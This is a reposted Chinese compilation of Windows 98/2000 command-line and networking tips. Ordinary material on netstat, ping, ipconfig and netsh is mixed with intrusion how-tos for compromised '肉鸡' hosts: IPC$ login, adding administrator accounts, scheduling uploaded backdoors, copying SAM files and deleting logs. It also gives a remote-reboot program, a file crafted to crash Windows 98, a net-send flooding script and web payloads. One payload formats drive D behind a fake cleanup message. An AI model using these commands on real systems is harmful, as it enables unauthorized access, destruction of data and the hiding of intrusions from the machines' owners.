网络部分
Posted zeng-qh
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了网络部分相关的知识,希望对你有一定的参考价值。
1)如何查看本机所开端口:
用netstat -a —n命令查看!再stat下面有一些英文,我来简单说一下这些英文具体都代表什么
LISTEN:侦听来自远方的TCP端口的连接请求
SYN-SENT:再发送连接请求后等待匹配的连接请求
SYN-RECEIVED:再收到和发送一个连接请求后等待对方对连接请求的确认
ESTABLISHED:代表一个打开的连接
FIN-WAIT-1:等待远程TCP连接中断请求,或先前的连接中断请求的确认
FIN-WAIT-2:从远程TCP等待连接中断请求
CLOSE-WAIT:等待从本地用户发来的连接中断请求
CLOSING:等待远程TCP对连接中断的确认
LAST-ACK:等待原来的发向远程TCP的连接中断请求的确认
TIME-WAIT:等待足够的时间以确保远程TCP接收到连接中断请求的确认
CLOSED:没有任何连接状态
2)如何获得一个IP地址的主机名?
利用ping -a ip 命令查看!再第一行的pinging后面的 『ip』前面的英文就是对方主机名!
同样道理,利用ping machine_name也可以得到对方的ip
获得一个网站的ip地址的方法是:ping www.***.com
比如想知道sohu的ip,就用ping http://www.sohu.com/来查看就可以了
顺便说一句:如果返回:Reply from *.*.*.*: TTL expired in transit的话,呵呵,代表TTL(生命周期)在传输过程中过期
什么意思呢?我来解释一下!
导致这个问题出现的原因有两个:1)TTL值太小!TTL值小于你和对方主机之间经过的路由器数目。 2)路由器数量太多,经过路由器的数量大于TTL值!
呵呵,其实这两点是一个意思!只不过说法不同而已!
3)如何查看本机的ip地址?
用ipconfig来查看就可以!
也可以再Windows中的开始菜单,运行中输入winipcfg,同样可以看到自己的ip
ipconfig命令后面如果加一个参数 /all的话,可以得到更加详细的资料,比如DNS、网关等……
4)再使用net命令的时候遇到一些错误代码,如何查看对应的错误信息?
用命令 net helpmsg erorr_code来查看就可以了
比如错误代码为:88
则查看命令为:net helpmsg 88 下面有这个错误代码的中文显示!
5)利用telnet连接到对方主机上,想获得一些系统信息,用什么命令?
set命令可以很好的完成你所需要收集信息的任务的!
方法:再cmd下直接输入set(telnet对方主机以后,也是直接set就可以了~然后能够得到NNNNN多的信息)
再这里,computername:呵呵,还用说么?主机名!
OS=Windows_NT :操作系统的类型哦~
path=C:\perl\bin\ :(perl的解释器位置!)
systemDrive=c: 操作系统盘符!
USERNAME=coldcrysky 当前登陆使用机器的用户
……
(6)跟踪路由器的命令是什么?
tracert 格式:tracert ip
中间会列出所有经过的路由器列表!这些路由器如果是暴露再防火墙外面的话,还可以看到路由的IP哦~呵呵(这里又涉及到了另外一个问题:为什么要把路由放在防火墙后面?原因呢,主要有两点:1)保护路由器!因为现在越来越多的攻击和入侵已经开始瞄准路由器了~如果直接把路由暴露在外面,呵呵,是非常危险的!被DoS了就不好了啊~呵呵,所以要放在防火墙里面;2)为路由器减少负担!如果所有的过滤功能统统都压在路由器上面,呵呵,路由器的负担就太大了!)
当然,利用pathping也可以达到同样效果!格式与tracert一样!
7)简单介绍一下cookie!
cookie,又名小甜点。
它的作用:记录访问者的一些信息。例如利用cookie记录你所登陆这个网页的次数、登陆时曾经输入的信息……
最常见的是,大家再登陆论坛(邮箱)的时候,经常在输入第一个字母的时候,往往下面就显示出了所有在本机登陆过该论坛(邮箱)的用户名吧?呵呵,这个就是cookie的作用!
大家在Administrator的cookies目录中可以看到很多的记事本文档吧?这些都是cookie,虽然经过了加密,但是仔细查找的话,仍然能够看到一些敏感信息!况且现在也已经有了专门查看cookie的软件!利用这些软件,你的隐私将不保哦~
那么,如何清除cookie呢?一般情况下,可以在Internet选项中的常规选项卡中看到一个删除cookies的按钮,点击就可以清楚掉了~
除此以外,还要在internet选项中的内容选项卡中找到自动完成按钮,把里面的四项都选中!然后点击清除表单,清除密码~
然后到操作系统目录所在的分区中!进入Winnt(98为windows)目录(当然了,这些都是默认的目录!如果你安装的时候改名了,就对应的去相应目录)之后找到Temporary Internet Files目录(2000的目录在c:\Documents and settings\administrator\Local settings\Temporary Internet Files)98直接到windows目录下找Temporary Internet Files就可以了~,找到这个文件夹后,打开!看到里面有NNNNNNNNNNNN多的文件了么?呵呵,这些是你浏览过的网页的记录(有的时候从网站上面看到漂亮的FLASH,可是不能保存怎么办?只要在线浏览一遍以后,断线到这里来找*.swf,之后依次打开查看的话,相信你会找到你所需要的FLASH的!),好了,跑题了~继续说:这些文件是网站的页面记录,直接删除就可以了!
另外,有没有彻底禁止cookie的方法呢?
呵呵,当然有了!在IE的Internet选项中,找到隐私选项卡!,把里面的滑块拖到最上面,边上写着:阻止所有cookie,呵呵,是不是?
另外一种方法:找到Windows目录下的cookies目录!把里面的txt文件全部删除!,最后应该只剩下一个index.dat文件!之后把这个文件夹设置成只读就可以了~
不过,禁止cookie后,大部分的论坛都无法正常登陆了啊!呵呵,到底禁止不禁止就看你自己的了~
8)安装2000的时候,速度会特别特别特别慢,怎么加快安装速度呢?
在DOS上面安装,应该用98启动光盘来引导系统!然后按照下面的方法来做,可以提高安装速度:
g:\>cd windows -------假设G为光驱 windows为98的安装目录!
g:\windows>smartdrv -------加载smartdrv程序!加载后没有任何提示信息!只要不返回错误信息就是加载成功了~这时候安装2K的话,速度会很快的哦~
9)Windows2K密码忘记了,如何才能进入系统?
Windows2K的用户配置信息和密码保存在SAM文件里!该文件位于:c:\winnt\system32\config目录中!只要删除这个文件就可以了~
另外,在c:\winnt\repair目录中也同样有一个SAM文件(这个是前者的备份!)如果你在登陆肉鸡的时候,copy前面那个目录中的SAM文件,你会发现COPY不下来!呵呵,为什么?因为运行着的2K系统会保护SAM文件啊~这个时候你就COPY这个就可以了!
10)ping不到,tracert不到,但是却能用nbtstat显示对方的一些信息,为什么?
因为tracert和ping命令使用的是ICMP协议!而nbtstat是通过对方的netbios端口来获得对方的主机信息的!使用的是UDP和TCP协议!如果对方仅仅只对ICMP协议做了禁止的话,那通过这个命令获得系统信息是正常的!
11)telnet上去后,如何给对方开共享?
开共享的命令如下:net share c=c:\winnt\system 返回共享成功
之后直接利用\\ip\c来访问对方的system目录了~删除共享用
share c /del 命令就可以了
12)如何判断对方的具体操作系统版本?
首先用ver命令查看对方的版本号!
如果是5.00.2195的话,为2K;5.1.2600为XP
从这里可以区分出来到底是2K还是XP了~下面进行更加具体的区分!
2K的pro和svr版本区分:
在telnet下,net shart查看启动的服务~如果对方开启了Terminal Services服务的话,基本上可以判断为svr以上的版本了~如果没有开启,则为pro!(具体方法有三种,因为前几天在论坛中我回复过暗界了~所以这里就不再重复了~)
XP的pro和home版的区分:
home edition是无法安装iis的!所以,可以通过iis服务来判断到底是home版或者是pro了~
当然了,如果对方是pro,但是将iis删除(停用)的话,就没办法判断了~呵呵
13)如何查看98的随机启动的程序?
在98下有一个实用配置程序(msconfig),中文名为:系统配置实用程序,调用的方法是在:开始--运行中输入msconfig,在里面,有一个启动的选项卡,点击后,可以看到很多随即启动程序,如果前面带有钩的话,就是启动时随机启动的,取消的话就是把前面的小钩去掉就可以了~(如果在这里查看到了一些未知的启动文件--比如没有文件的具体路径,或者没有文件名的话,最好取消它的自启动!因为很有可能是木马!)
除了这里以外,还有config.sys、autoexec.bat、system.ini、win.ini几个选项卡,他们分别对应这几个文件!只不过在这里更方便查看而已!
14)设置了BIOS密码,可是却忘记了,该怎么办?
如果是可以进入Windows的话,可以找找biospwds和cmospwd这两个软件看看~
还有利用DEBUG法:
简单介绍两种:
1)-o 70 16
-o 71 13
-q
2)-o 70 16
-o 71 16
-q
另一种方法:copy法:
copy con cmos.com
输入下面10个字符:alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格,然后按下F6并回车,退出,运行这个cmos.com程序就可以了~
恩,如果不能进入Windows怎么办呢?
简单介绍两种方法:
1)用通用密码:
Award Bios密码:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589
AMI bios密码:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.
这是常见的密码,不妨试试~
如果不行的话,可以利用CMOS放电:
就是把主板上的电池取下来,等一会儿再插上去~
15)如何自制一个让98蓝屏的炸弹?
恩,这个是前几天QQ上面朋友问我的问题,整理的时候突然间想起来了,就写一下好了~
首先,打开Word,再插入菜单中选择对象,这时,弹出对象包装程序窗口,再这个窗口中,点击导入,随便找一个文本或者程序就可以!之后点:编辑菜单。这里选择命令行,出现一个命令行窗口,在里面协商c:\con\con,点击保存,完成后,再点编辑包中的复制包,把他随便到一个地方复制下来,之后看到的是一个名位片断的东西!给这个文件起一个名字,呵呵,传给那个可怜的家伙吧,等待他蓝屏,掉线!
(这个命令行中可以插入很多的命令,不见得非要用这个98蓝屏漏洞哦~)顺便说一下:这个已经不是什么新鲜的技术了,这个技术的名字叫做:碎片对象。呵呵,碎片?记忆碎片么?不是的!他的后缀是:.shs!之所以说一下这个,是因为有的朋友还不知道~做一个整理而已!不知道的朋友看过后就知道了,知道的朋友就权当复习了~另外,不要利用这个方法做破坏!否则后果自负!
16)如何再命令行下杀死对方进程?
利用微软的2K以上操作系统都是含有这个工具的!该工具包含在2K光盘的\support\tools文件夹下!里面有安装程序,点击后,就安装了2K的support tools工具包,里面有kill这个工具,这时候再cmd下可以输入kill/?,就可以看到帮助了,使用这个命令的格式是:kill pid (pid是进程的ID号!)再任务管理器中可以看到进程的ID号!(不知道有几位朋友用过蓝色火焰?呵呵,用法跟这个一摸一样!还有很多类似的木马、后门软件都有类似的功能!这个是windows自带的大木马『后门工具』而已!)
这时候,有朋友问了,那再命令行下如何查看进程呢?呵呵,这就用到了系统自带的有一个后门工具了:再刚才说得那个目录中,还有一个工具叫tlist 看名字就能看出来是干什么的吧?用法更简单!直接输入tlist就可以得到pid遇队形程序的列表了~
那对方机器如果没有安装这两个程序怎么办呢?没关系,你把你操作系统盘符下面programfiles\support tools目录下面的这两个对应的exe文件上传到对方的winnt\system32目录中就可以了!呵呵~
17)上次说了ping的基本用法,这次谈谈ping的命令参数!
这个是本次问题集的重点部分!无论是小鸟还是老鸟,你们能保证你真的对这些参数了如指掌么?恐怕都未必!还是好好看看吧!
这是TCP/IP协议中最有用的命令之一
它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)
-a Resolve addresses to hostnames.(把IP转为主机名)
-n count Number of echo requests to send.(响应请求的数量)
-l size Send buffer size.(封包的大小)
-f Set Don`t Fragment flag in packet.(信息包中无碎片)
-i TTL Time To Live.(时间)
-v TOS Type Of Service.(服务类型)
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧)
-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)
比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。
其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。
18)如何查看本机的DNS服务器?
ipconfig其实是可以的(呵呵,上次就介绍过这个命令),除此以外,还可以利用一个命令:再cmd下输入netsh,进入到netsh>提示符,再输入:int ip 进入到interface ip> 然后再次输入dump,这时候屏幕上出现当前连接的配置情况了
这里必须介绍一下netsh到底是作什么用的!这个命令比较复杂,他包含了很多的子命令,所以这里只对部分命令进行讲解:
1)查看本机IP:首先键入netsh,再netsh>提示符下输入:interface 回车 之后:ip 回车 再之后:show address 回车 这样,就可以看到当前连接的IP地址和子网掩码。(其实这个命令不如ipconfig简单,也不如ipconfig/all全面)
2)修改网络配置:接着上面的命令,我们使用:set address name=“本地连接” source=static addr=192.168.0.200 mask=255.255.255.0,这样就修改了当前的IP地址,用show address来看看(或者用ipconfig)
3)显示一个完整的网络配置教本:
刚才说过,第一个命令显示的信息不如ipconfig/all全面,不用着急,netsh再打印显示网络配置上,还是有自己的特色的!例如:再interface ip>状态下输入:dump,会显示一个清单,显示所有本地连接(不管你是否使用~)与netstat -an不完全一样!
这就是netsh的简单介绍和最基础的用法!希望大家能够掌握!还可以输入?来查看帮助!(要在netsh>提示符下才能查看帮助啊~)
19)肉鸡上的部分文件无法删除,怎么办?
如果对方的文件夹是只读的话,会出现拒绝访问的字样!这时候,我们可以再del命令后面加上/f参数来删除!
20)再说一个可以限制用户登陆时间的命令!
再net命令中就可以实现这样的功能!具体方法如下:
假如我们打算让:coldcrysky这个用户再周日到周易的上午八点到下午四点之间可以登陆,用这个命令:
net user coldcrysky /timesunday-monday,08:00-16:00
之后利用net user coldcrysky命令来查看登陆时间的限制,可以看到是我们所规定的时间(因为是中文的,很容易懂,我就不多废话了)
在此,特别提醒各位:命令中:星期日才是一周的开始!!!不要当成星期一!
光说了怎么设置,如果想恢复回去怎么办呢?(就是恢复成默认状态,任何时间都可以登陆的状态)
看我的:net user coldcrysky /time:all --这样就可以了~
22)如何删除windows2K的默认贡献?
首先打开记事本,输入如下内容:
net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share g$ /delete
net share ipc$ /delete
net share admin$ /delete
这里的c$、d$、e$……是代表默认共享的盘符~又几个就设置几个就可以了~
之后点击保存成批处理文件(后缀为:bat的文件!)!加入到启动组中就可以了~
23)139端口的又一用法
呵呵,写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先声明两点:1)不要利用本帖所提到的方法去搞恶意破坏!2)呵呵,可能许多人已经知道了139端口这个用法了~本文只想起到一个抛砖引玉的作用!
废话不多说了~开始:
如果你使用NT主机的话,那你可要注意了!
重启NT主机的方法如下:
1:Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username"
建立一个IPC连接
2:net use H: \\XXX.XXX.XXX.XXX\C$
将对方的C盘映射为自己的h盘
3:copy c on h:\reboot.bat
Iisreset /reboot
CTRL+Z
在对方的C盘上生成一个能重启机器的文件
4:net time \\XXX.XXX.XXX.XXX
得到对方机器时间
5:at \\XXX.XXX.XXX.XXX 重启的时间 c:\reboot.bat
设定对方重启的时间!
6:at \\XXX.XXX.XXX.XXX
查看任务上面是否添加了这个任务
7:等对方重启好了~
上面的第三步是only for Win2K的,如果是Nt,就需要用意个指定的重启程序,我们可以自己编写一个reboot.exe来代替reboot.bat,代码如下:
#include "stdio.h"
#include "windows.h"
int main()
{
文件://定义重启的时候发送给所有用户的消息
LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";;
文件://尝试用最简单的API函数重启
if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;
if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;
文件://因为上面的重启不成功,所以需要调整本进程的特权
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;
文件://获取重启的特权 SE_SHUTDOWN_NAME
LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);
文件://判断是NT内核还是9X内核,选择用不同的方式
if(!GetVersion()& 0x80000000))
InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
else if (!ExitWindowXXX(EWX_REBOOT,0))
if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
return FALSE;
return TRUE;
对了,再次说明啊,别用本文提到的方法搞破坏,小心警察叔叔打PP~呵呵
24)利用批处理文件来建立一个记录3389登陆者信息的记录器
由于Terminal Service默认是没有日志记录的,只能依靠他的系统日志,但是系统日志只能记录一些大动作(开启或停止服务),那么,如何用批处理文件来编写一个将是3389端口的程序呢?很简单:
建立一个批处理文件:内容如下:
@echo off
date/t >> c:\3389log.txt
:TS3389
time/t >> c:\3389log.txt
netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt
goto :TS3389
之后保存!
如果有人用你的3389登陆你的机器,呵呵,在c盘下就有3389log.txt这个文件!记录了当天日志,还有连接时间……资料~开始反击~呵呵
25)网络命令小节
A、NET命令:
IPC连接:格式 net use \\对方IP\ipc$ "密码" user:"用户名" 『建立IPC连接~』
net use \\对方IP\ipc$ /delete 『断开连接~』
以下操作需要在连接到对方主机后才可进行!!!
net user coldcrysky xyz /add 『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』
net localgroup Administrator coldcrysky /add 『把名为coldcrysky的用户加入ADMIN组-以为着权限的提高啊!!!^_^』
net use z:\\对方IP\C$ 『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符!』
net start telnet 『开启TELNET』
net user guest /active:yes 『激活GUEST』
net user guest coldcrysky 『把GUEST密码改为COLDCRYSKY』
B、AT命令:
查看远程机时间:net time \\对方IP
加入一项新任务:
at \\对方IP 时间 文件名 『用来把自己上传的后门程序在制定时间运行,方便以后进入肉鸡!』
C、TELNET命令:
telnet 对方IP 端口 『作用不用我说了吧???』
D、FTP命令:
登陆:ftp 对方网址(IP地址)
上传文件:get 文件在本机完整路径 对方文件存放完整路径
下载文件:put 对方文件完整路径 本机存放文件路径
E、COPY命令:
在建立连接后(尤其是IPC$连接后,很有用的命令哦~)
⑴copy index.htm \\127.0.0.1\c$\index.htm
『将本机index.htm文件复制到127.0.0.1的C盘下,如果要放到对方的NT目录下,则把C改为admin$』
⑵copy \\127.0.0.1\admin\repair\sam_ c: 『将远程机数据库文件拷贝到本机C盘根目录下』F、SET命令:
主要用于分析目标计算机的基本信息用!具体使用方法请查找相关文件!
G、NBTSTAT命令:
nbtstat -A 对方IP (这个A大写)
『在其中显示<037>前面的英文或数字就是计算机名称!当然,也可以利用PING -A 对方ip的方法来查看对方主机名!效果相同!!!』
H、SHUTDOWN命令:
『用来关闭对方NT服务的命令』格式如下:
shutdown \\IP地址 t:20
『20秒后自动关闭对方NT服务!由于对对方机器影响较大,慎用!!!』
I、DIR命令:
还用我说么?大家是不是早就该掌握了???(不知道的还是查阅相关资料吧~~~)
J、ECHO命令:
echo coldcrysky >index.htm 『用coldcrysky覆盖掉原INDEX.HTM中所有内容』
echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』
K、ATTRIB命令:
更改文件属性用,格式:
Attrib -r index.htm 『去掉只读属性』(+- 分别代表增加和减少)
L、DEL命令:
『删除日志的时候用!』
del c:\winnt\system32\logfiles\*.*
del c:\winnt\system32\config\*.evt
del c:\winnt\system32\dtclog\*.*
del c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log
M、PING命令:
-t :ping制定IP,知道网络断开或按CTRL+C结束!
-a :解释PING IP的主机名
-n count :发送count指定的ECHO数据包,默认为4个!
26)这里我必须(或者说不得不重新重申一个命令!不过说之前我要把这个命令的相关命令稍微介绍一下!)
我要说的命令就是:开启服务和停止服务的net start and net stop
这两个命令大多数朋友已经很熟悉了吧?不过为了方便更多的菜鸟能看明白我要说的意思,不用再看其他相关文章,所以我简单说两句:net start是开启服务!那么,如何开启呢?比如,我们这里要开启telnet服务,那就直接再2K的cmd下输入:net start telnet就OK了~关闭一项服务的话,把start换成stop就OK了~不过这里必须要注意:你所关闭的服务必须是已经开启的服务!!!好像是一句废话
OK,有了这个前提后,下面就继续介绍:那么,net start和net stop到底能开启什么服务?其实这点也不需要你强记,记住这个命令就可以了:net help start和net help stop,这两个会显示出你所能开启的服务有那些~~
这里比如我们查到了这个服务“CLIENT SERVICE FOR NETWARE”,那么当这个命令使用net start和net stop的时候,你必须在这项服务上面加上“”,原因是因为这个服务名称中带有空格!如果服务名称中不带空格,你可以不用带这个引号!!!这点是我强调的问题!大家一定不要忘记了!『前些天看到S8S8.net的黑白新区中有人说net start 和 net stop后面的服务名必须带空格是错误的!明白原因了吧?』
27)关于双系统的两个问题:
A、如何在双系统(98、2000)中安全删除2K?
先制作一张Windows 98 的启动软盘,再用它启动你的计算机,运行sys命令恢复Windows 98引导记录后,再运行fdisk/mbr恢复主引导记录,完成后进入Windows 98,把winnt 和system volumn information 目录删除,再删掉C盘上的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行了。
B、 Windows 98/XP双系统启动菜单修复
1.修复前,在BIOS中设置从光驱启动。用Windows XP安装盘启动电脑,在加载必要的驱动后,出现Windows XP的安装界面。有三个选项:
(1)要现在开始安装Windows XP,请按“Enter”键。
(2)要用“恢复控制台”修复Windows XP安装,按“R”键。
(3)要退出安装程序,不安装Windows XP,按“F3”键;
2. 按“R”键,进入“Microsoft Windows XP (TM) 故障恢复控制台”界面;故障恢复控制台提供系统修复和故障恢复功能。系统这时会搜寻已安装的Windows XP系统文件,然后显示搜寻结果,并询问“要登录到哪个Windows XP安装(要取消,请按Enter)”,选择1. D:\Windows,回车,系统会再询问“管理员密码”,再键入安装Windows XP时设置的管理员密码,回车,出现D:\Windows〉,这时需要输入修复命令Fixboot,后面的参数为启动扇区要写入的磁盘盘符,这里填入C:,回车。修复完成,键入Exit退出。重启后就会看到久违的双重启动菜单了。并且,这样修复后基本不产生垃圾文件。
因为这两个问题是非常非常普遍的,所以我就收集到这里了~
28)这里说几个主页恶意代码:『并不是让大家把这些代码加入到自己的主页中!只是希望大家能了解恶意代码,起到更好的防护作用!』
A、死循环代码:
『把下列代码加入到网页中,可达到如上效果』
<img src=javascript:location=“网页的文件名.htm:”>
说明:当含有这段代码的网页被人点击,连接就会不断的打开IE浏览器,直到你的系统资源浪费到0%~只有重新启动才能正常使用!
预防方法:禁用所有的ActiveX控件和插件!因为这是一个ActiveX教本程序~
B、恐怖的大图片:
『把下列代码加入到网页中,可达到如上效果』
<img src= "http://恐怖图片的连接地址" width= "1" height= "100000000000000000000000">
说明:当打开这样的网页,IE会不断的解释试图打开,但由于图片实在太大,超出了其处理能力,所以……
C、地震死机代码:
『把下列代码加入到网页中,可达到如上效果』
<script>
if (window.top.moveBy){
for (i = 1;i < 50; i++){
for (j = 3;j > 0; j--){
window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i*2);
window.top.moveBy(-i*2,0);
window.top.moveBy(0,i);
window.top.moveBy(i,0);
}
}
}
</script>
<img src="c:\con\con">
说明:<img src="c:\con\con">是windows9x的设备名称解析漏洞!
WINDOWS9x的\con\con设备名称解析漏洞允许用户进行攻击,倒是98死机。原理:我们知道,CON是DOS下的特殊设备名,不允许做文件名,如果我们在DOS下键入如下命令:copy coldcrysky.txt con,系统会显示coldcrysky.txt的内容,如果换成:copy coldcrysky.txt>con系统会提示文件不能拷贝到文件自身。如果吧con换成LPT或PRN,则输出coldcrysky.txt到打印机。由此可见,CON代表文件本身,如果使用\CON\CON命令,则意味着系统不断调用文件本身,视系统资源迅速枯竭,连按CTRL+ALT+DEL的机会都没有~
解决办法:
对于9X系统,强烈建议打补丁!!!2000和XP则不会死机~
D、格式化硬盘:(最恐怖的~~~慎用!!!请勿用于非法用途!!!使用后如果有任何负作用,后果自负!与伤寒天空『ColdCrySky』;乱刀留影无关!!!)
scr,Reset();
scr.Path="C:\\WINDOWS\\StartMenu\\Programs\\启动\\startup.htm";
scr.Doc="<object id=`wsh` classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`>"
WSH.rUN(`start/m format.com d:/q/autotest/u`);
alert(`IMPORTANT : Windows is removing unused temporary files.`);
scr.write();
说明:当您浏览了网页,会把startup.hta文件写入启动文件夹,并提示WINDOWS正在删除临时文件!实际上是在格式化你的D盘,代码中的:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B对应为:Windows Scripting Host Shell Object。代码中的:WSH全称是:Windows Scripting Host,是微软的一种基于32位系统平台与语言无关的教本解释机制,它使得脚本能在WINDOWS桌面或命令提示符下运行~WSH所对应的程序WScript.exe是一个脚本语言解释器,位于WINDOWS所在文件夹下,所以它可以像执行批处理文件一样执行WSH脚本程序~
解决方法:1)更新您的浏览器,使用最新的浏览器上网!
2)修改msdos.sys,在其中加入:Bootmentu=0命令行,目的是禁用启动菜单。
3)吧format.com改名
4)禁用WSH。具体方法:在win98中,从添加删除程序中点击WINDOWS安装程序,打开附件一项,将WINDOWS SCRIPTING HOST前面的选项去掉,就可以卸载掉WSH了~~~win2000和xp的用户可以在我的电脑-工具菜单-文件夹选项-选择文件类型,找到VBS VBSCRIPT FILE选项,点击删除!
29)系统自带的系统工具
其实无论大家从什么地方,什么方法找到一些好用的工具,都不如Windows自带的工具用着方便(假设你区的地方正好不能上网,而你又没有准备好这些工具,那怎么办?呵呵,不用着急,用好下面几个Windows自带的小工具,可以使你事半功倍!)
1、msinfo32.exe
位于C:\Program Files\Common Files
Microsoft Shared\Msinfo\msinfo32.exe,显示计算机中的有关系统信息,可用其诊断、解决计算机问题并查看远程系统所生成的系统报告。
2、drwatson.exe --这个工具给我特别的亲密感觉:第一次使用这个工具是在看了LK007大哥给cool兄弟的回复以后,我马上试验~果然很有意思!LK007不愧是大哥!现在想起来都佩服不已~~~
位于C: \Windows \drwatson.exe,当某个应用程序在运行过程中出错时,它就会将出错的程序以及出错的内存地址一一记录下来,并保存为Windows的Drwatson子目录下的*.wlg记录文件。
3、sfc.exe
位于C:\Windows\System\sfc.exe,用于自动搜索被改变、删除或损坏了的系统文件。
4、msconfig.exe
位于C:\Windows\System\msconfig.exe,通过修改启动方式以及启动时运行哪些应用程序等系统配置,从而达到快速排除故障的目的。
5、scanreg.exe
位于C:\windows\command\scanreg.exe(DOS版本)及C:\windows\scanregw.exe(Windows版本),用于检查、修复、备份以及还原系统注册表及相关配置文件的工具软件,防止因注册表数据被破坏而导致的系统故障。
6、vcmui.exe
位于C:\Windows\vcmui.exe,在后台自动将被覆盖的驱动程序备份下来,当我们安装的新驱动出错时可用它进行恢复。
7、winrep.exe
位于C:\Windows\winrep.exe,能自动收集有关系统信息并提示用户输入故障所在,帮我们编写一篇完整的“求援”报告,并将其发送给有关技术维护人员,简化“求援”操作。
这七个Windows自带的小程序可以在开始菜单--运行中直接输入文件名(无需输入扩展名)调出该程序!
31)批处理在入侵中的几则妙用!
A、简化IPC$登陆肉鸡的操作:
用记事本建立一个名字为:ipcruqin.bat的批处理文件,内容如下:
@net use \\%1\ipc$ %3 /u:"%2"
@echo OK!已经成功建立连接
之后,大家在CMD下输入:ipcruqin.bat 肉鸡IP 肉鸡的admin帐号/用户的密码。就可以登陆上去了,而不需要那一大长串的命令了!
B、批处理轰炸对方电脑:
打开一记事本,在里面输入如下内容:
@echo 正在轰炸中……
tart
@net send %1 %2
@if errorlevel 1 goto over
goto start
ver
@echo 发送失败
将其保存为bat格式的文件即可,使用方法:*.bat(该批处理文件的名字)+ 空格 + 目标IP + 空格 + 你要对他说得话!
这次先简单介绍这三个!等下次有机会再给大家介绍更多的批处理文件的用途!
32)再说几个非常简单实用的DOS命令(工具):
A、fport.exe --查看那些端口都是那些程序使用的命令。
B、netstat -an --查看那些端口于外部的IP连接。比如这里显示 :23 XX.XX.XX.XX 而你又没有开23端口,那么,呵呵……还用我说么?
C、letmain.exe \\ip -admin -d --列出本机的administrators组的用户名查看是否有异常。
D、pslist.exe --列出进程
E、pskill.exe --杀掉进程,有时候再任务管理器中无法终止程序,那就用这个工具来停止进程。
F、login.exe --列出当前有那些用户登陆再你的机器上。
ping命令详解
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list
Options:
-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.
不停的ping地方主机,直到你按下Control-C。
此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。
-a Resolve addresses to hostnames.
解析计算机NetBios名。
示例:C:\>ping -a 192.168.1.21
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Ping statistics for 192.168.1.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。
-n count Number of echo requests to send.
发送count指定的Echo数据包数。
在默认情况下,一般都只发送四个数据包,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助,比如我想测试发送50个数据包的返回的平均时间为多少,最快时间为多少,最慢时间为多少就可以通过以下获知:
C:\>ping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
………………
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
